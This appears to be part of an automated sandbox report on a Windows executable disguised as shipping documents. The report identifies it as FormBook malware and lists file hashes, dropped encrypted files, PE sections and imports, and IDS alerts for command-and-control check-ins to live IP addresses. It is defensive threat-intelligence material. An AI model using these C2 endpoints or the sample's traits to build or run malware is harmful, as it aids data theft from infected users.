                  OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                  • 199.191.50.83
                  5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                  • 199.191.50.83

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\1m0Sa73J8

                  Download File
                  Process:C:\Windows\SysWOW64\netbtugc.exe
                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category:dropped
                  Size (bytes):114688
                  Entropy (8bit):0.9746603542602881
                  Encrypted:false
                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\Ramada

                  Download File
                  Process:C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):287744
                  Entropy (8bit):7.995430162645649
                  Encrypted:true
                  SSDEEP:6144:4jk++vBTV4FUfb9mKydXwr3s5gZJQEj87FvtgQ3o3QuLeC3:hBvBTV4Gfb91SwYgZj87n3o3QQ
                  MD5:C0B7D225D31BA2653AEF8F8EC8598FEF
                  SHA1:31A499385D24C8E112ED717723D2316BDFABE2DC
                  SHA-256:1EB42C56A454BD83B0D20D2B3551ACC9E8B9DDDB973BDE7798CC738FA53E9FB5
                  SHA-512:BF66564984C49E3798C5A83DA09CCC4C6E0FB60F38E45DC77901A7339C1D5080E055BAE64CA6451AF71B12369C709690F6C9C09F25F771165E95CCB7E00A543A
                  Malicious:false
                  Reputation:low
                  Preview:...a.QY1T...1....t.NH..e7_...F3ZQY1TECX8A2F1HBNKNWLM4WEYWF3.QY1ZZ.V8.;...C..o.$$Gw5+8!A;<yR5+-7LaP#.:7 k'9l.{.e48"Vt\T;pECX8A2FHIK.v.0.pT0.d7!.@...n%$."..(%.Q...qT0..>%[g1>.TECX8A2Fa.BN.OVL...YWF3ZQY1.EAY3@9F1.FNKNWLM4WE9CF3ZAY1T5GX8ArF1XBNKLWLK4WEYWF3\QY1TECX816F1JBNKNWLO4..YWV3ZAY1TESX8Q2F1HBN[NWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX.5W>EHBN..SLM$WEY.B3ZAY1TECX8A2F1HBNkNW,M4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBN

                  C:\Users\user\AppData\Local\Temp\aut490B.tmp

                  Download File
                  Process:C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):287744
                  Entropy (8bit):7.995430162645649
                  Encrypted:true
                  SSDEEP:6144:4jk++vBTV4FUfb9mKydXwr3s5gZJQEj87FvtgQ3o3QuLeC3:hBvBTV4Gfb91SwYgZj87n3o3QQ
                  MD5:C0B7D225D31BA2653AEF8F8EC8598FEF
                  SHA1:31A499385D24C8E112ED717723D2316BDFABE2DC
                  SHA-256:1EB42C56A454BD83B0D20D2B3551ACC9E8B9DDDB973BDE7798CC738FA53E9FB5
                  SHA-512:BF66564984C49E3798C5A83DA09CCC4C6E0FB60F38E45DC77901A7339C1D5080E055BAE64CA6451AF71B12369C709690F6C9C09F25F771165E95CCB7E00A543A
                  Malicious:false
                  Reputation:low
                  Preview:...a.QY1T...1....t.NH..e7_...F3ZQY1TECX8A2F1HBNKNWLM4WEYWF3.QY1ZZ.V8.;...C..o.$$Gw5+8!A;<yR5+-7LaP#.:7 k'9l.{.e48"Vt\T;pECX8A2FHIK.v.0.pT0.d7!.@...n%$."..(%.Q...qT0..>%[g1>.TECX8A2Fa.BN.OVL...YWF3ZQY1.EAY3@9F1.FNKNWLM4WE9CF3ZAY1T5GX8ArF1XBNKLWLK4WEYWF3\QY1TECX816F1JBNKNWLO4..YWV3ZAY1TESX8Q2F1HBN[NWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX.5W>EHBN..SLM$WEY.B3ZAY1TECX8A2F1HBNkNW,M4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBN

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.260050940909476
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:SHIPPING DOC MBL+HBL.exe
                  File size:1'280'512 bytes
                  MD5:e57f3cdd911cbaf924bf1e6e7dcc7795
                  SHA1:eba646965b6549a2cc716c20f128d989cd192f50
                  SHA256:61b3a4a9ae0b5189dd42a97b9c680e3787d9d3da3b481701e5795d16480141b1
                  SHA512:8692f8951faac03450c36112dd2627e557b827f86c3bcfe21749ffb2e54f145a284e9e7c1ac1a891c97b995862aa12014d2f0c0fc9597c296c3c673e5da2dc22
                  SSDEEP:24576:4Cdxte/80jYLT3U1jfsWarjhjvXZrPWEckImNQ:Rw80cTsjkWar5lOXkk
                  TLSH:F455CF2273DDC371CB669173BF6AB7016EBF78610630B85B2F880D7DA950162162DB63
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                  File Icon

                  Icon Hash:aaf3e3e3938382a0

                  Static PE Info

                  General

                  Entrypoint:0x427f4a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66E37C1B [Thu Sep 12 23:41:15 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7

                  Entrypoint Preview

                  Instruction
                  call 00007FEFE91C946Dh
                  jmp 00007FEFE91BC234h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007FEFE91BC3BAh
                  cmp edi, eax
                  jc 00007FEFE91BC71Eh
                  bt dword ptr [004C31FCh], 01h
                  jnc 00007FEFE91BC3B9h
                  rep movsb
                  jmp 00007FEFE91BC6CCh
                  cmp ecx, 00000080h
                  jc 00007FEFE91BC584h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007FEFE91BC3C0h
                  bt dword ptr [004BE324h], 01h
                  jc 00007FEFE91BC890h
                  bt dword ptr [004C31FCh], 00000000h
                  jnc 00007FEFE91BC55Dh
                  test edi, 00000003h
                  jne 00007FEFE91BC56Eh
                  test esi, 00000003h
                  jne 00007FEFE91BC54Dh
                  bt edi, 02h
                  jnc 00007FEFE91BC3BFh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007FEFE91BC3C3h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007FEFE91BC415h
                  bt esi, 03h

                  Rich Headers

                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x700d4.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1380000x7130.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x8dd2e0x8de00c2c2260508750422d20cd5cbb116b146False0.5729952505506608data6.675875439961112IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x8f0000x2e10e0x2e2004513b58651e3d8d87c81a396e5b2f1d1False0.3353340955284553OpenPGP Public Key5.760731648769018IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xbe0000x8f740x5200c2de4a3d214eae7e87c7bfc06bd79775False0.1017530487804878data1.1988106744719143IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xc70000x700d40x70200e42f17cc5c9fefad7202dd641b373321False0.9411253658026756data7.922366333206114IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x1380000x71300x72001254908a9a03d2bcf12045d49cd572b9False0.7703536184210527data6.782377328042204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                  RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                  RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                  RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                  RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                  RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                  RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                  RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                  RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                  RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                  RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                  RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                  RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                  RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                  RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                  RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                  RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                  RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                  RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                  RT_RCDATA0xcf7b80x67339data1.000321731292863
                  RT_GROUP_ICON0x136af40x76dataEnglishGreat Britain0.6610169491525424
                  RT_GROUP_ICON0x136b6c0x14dataEnglishGreat Britain1.25
                  RT_GROUP_ICON0x136b800x14dataEnglishGreat Britain1.15
                  RT_GROUP_ICON0x136b940x14dataEnglishGreat Britain1.25
                  RT_VERSION0x136ba80x13cdataEnglishGreat Britain0.5791139240506329
                  RT_MANIFEST0x136ce40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                  Imports

                  DLLImport
                  WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                  VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                  COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                  WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                  PSAPI.DLLGetProcessMemoryInfo
                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                  USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                  UxTheme.dllIsThemeActive
                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishGreat Britain

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-14T11:11:12.968205+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497373.33.130.19080TCP
                  2024-09-14T11:11:29.516502+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973818.139.62.22680TCP
                  2024-09-14T11:11:32.059029+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44973918.139.62.22680TCP
                  2024-09-14T11:11:34.612983+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974018.139.62.22680TCP
                  2024-09-14T11:11:37.124367+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974118.139.62.22680TCP
                  2024-09-14T11:11:42.992237+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974266.81.203.1080TCP
                  2024-09-14T11:11:45.518035+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974366.81.203.1080TCP
                  2024-09-14T11:11:48.128716+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44974466.81.203.1080TCP
                  2024-09-14T11:11:50.612929+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44974566.81.203.1080TCP
                  2024-09-14T11:11:57.285087+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449746103.42.108.4680TCP
                  2024-09-14T11:11:59.884516+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449747103.42.108.4680TCP
                  2024-09-14T11:12:02.431525+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449748103.42.108.4680TCP
                  2024-09-14T11:12:04.990794+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449749103.42.108.4680TCP
                  2024-09-14T11:12:11.113126+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497503.33.130.19080TCP
                  2024-09-14T11:12:14.599655+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497513.33.130.19080TCP
                  2024-09-14T11:12:16.217823+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4497523.33.130.19080TCP
                  2024-09-14T11:12:18.771437+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.4497533.33.130.19080TCP
                  2024-09-14T11:12:32.486159+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449754199.59.243.22680TCP
                  2024-09-14T11:12:35.042182+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449755199.59.243.22680TCP
                  2024-09-14T11:12:37.822272+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449756199.59.243.22680TCP
                  2024-09-14T11:12:40.145807+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449757199.59.243.22680TCP
                  2024-09-14T11:12:45.819857+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449758162.0.239.14180TCP
                  2024-09-14T11:12:48.348923+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449759162.0.239.14180TCP
